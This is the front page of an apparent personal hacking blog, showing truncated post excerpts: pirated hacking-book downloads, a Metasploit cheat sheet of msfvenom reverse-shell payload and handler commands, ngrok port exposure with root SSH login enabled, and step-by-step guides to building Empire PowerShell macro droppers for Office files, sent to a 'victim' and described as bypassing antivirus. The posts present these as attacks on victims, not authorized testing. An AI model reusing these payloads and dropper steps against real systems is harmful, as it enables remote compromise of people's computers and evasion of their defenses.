j3ssie's Blog

Today I'm gonna give away the best books collections  for hacking from my " library ". Below is the details of the collections(download link including): Advanced Persistent Threat Hacking, The Art & Science Attacking Network Protocols A Hacker’s Guide to Capture Analysis and Exploitation Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters Digital Forensics and Incident Eldad_Eilam-Reversing__Secrets_of_Reverse_Engineering-Wiley(2005) Fuzzing Brute Force Vulnerability Discovery Google Hacking for Penetration Testers Volume2 - Nov 2007 Google_Hacking Google.Hacking.Filters Gray Hat Hacking The Ethical Hacker’s Handbook Fifth Edition Gray Hat Python - Python Programming for Hackers and Reverse Engineers (2009) Hacking Exposed 2.0 (Web) Best Book Hacking Exposed Computer Forensics 2nd Edition Hacking Exposed Linux, 3rd Edition Hacking Exposed Mobile Security Secrets & Solutions Hacking Exposed Unified Communications & VoIP, 2nd ...

Creating Metasploit Payloads Metasploit - Most Used Pen Testing Tool Usually when you use metasploit, you need to create a payload and send that payload to your victim. Here is some useful command to create payload for many platform. Acronym for this post: LHOST: local host - commonly is attacker IP LPORT: local port - default is 4444 RHOST: remote host - commonly is victim IP [Handlers] Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z [List payloads] msfvenom -l [Binaries] Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Addr...

[*] Hi everyone, today I'm gonna show you how to open port forwarding without router with ngrok. [?] Why you need to open port forwarding? => Obviously, sometimes you need to access service your machine from outside local network like SSH, HTTP, etc but some reason you can't set it up on your router. [Installation] - Firstly, you need to download ngrok from  https://ngrok.com/download - Sign up an account if you want to open any tcp port.  After that type this command to  Install your authtoken: ./ngrok authtoken  <your_auth_token> - Type the command below if you want run ngrok directly from terminal: cp ~/Download/ngrok /usr/bin/ [!]  ' ~/Download/ngrok ' is location of ngrok file. [Usage] - You need to start the service that you want to access. For example I'll start apache2. service apache2 start [!]  Make sure you modify sshd_config file to allow root login if you want to login ssh as root - Now time to run ngrok: ...

[*] Hack windows through Office file using powershell attack [*] - You need to install Empire to create macro code (check video Config Empire ). - Config listener on empire:   ./empire  listeners  uselisteners http_com  set Name <listener_name>  set Port <listener_port>  execute   - Create macro code:    usestager windows/macro < listener_name >  set OutFile <Output_path>  execute - Embedded macro to Office file:   Word --> View --> Macro --> Copy your macro code. - Wait for victim run office file. => And you got a victim. [*] Video Demo: 

[*] How to config and use Empire 2.0 to perform powershell attack [*] [!] Note:  PowerShell can be run in memory where antivirus can’t see it, so it  obviously bypass antivirus. - Clone and install Empire.  git clone https://github.com/EmpireProject/Empire  cd Empire/setup  ./install.sh - How to use Listener.    ./empire  listeners  uselisteners <type_of_listener>  set Name <listener_name>  set Port <listener_port>  set DefaultDelay <delay_time>  info  execute - How to use stager.  main  usestager <stager_name> < listener_name >  info  [set <variable> <value>]  [info]  execute => Payload have been create. - Send payload to your victim. - Wait for victim run payload and get agents. - Interact with agent.  agents  interact <agents_name>  rename <agents_name_you...

[*] Today, I'm gonna share list of tool that I usually use while pentesting. Infomation Gathering and Reconnaisance Sn1per Datasploit Discover script Recon-ng Google Hacking Maltegoce Scanning  Nmap Knockpy Dirb Dirsearch Masscan Nessus Acunetix Exploitation Metasploit Sqlmap Burp Suite TheFatRat Veil-Evasion Custom script on Internet such as Exploit-DB Maintain Access Backdoor factory Netcat Empire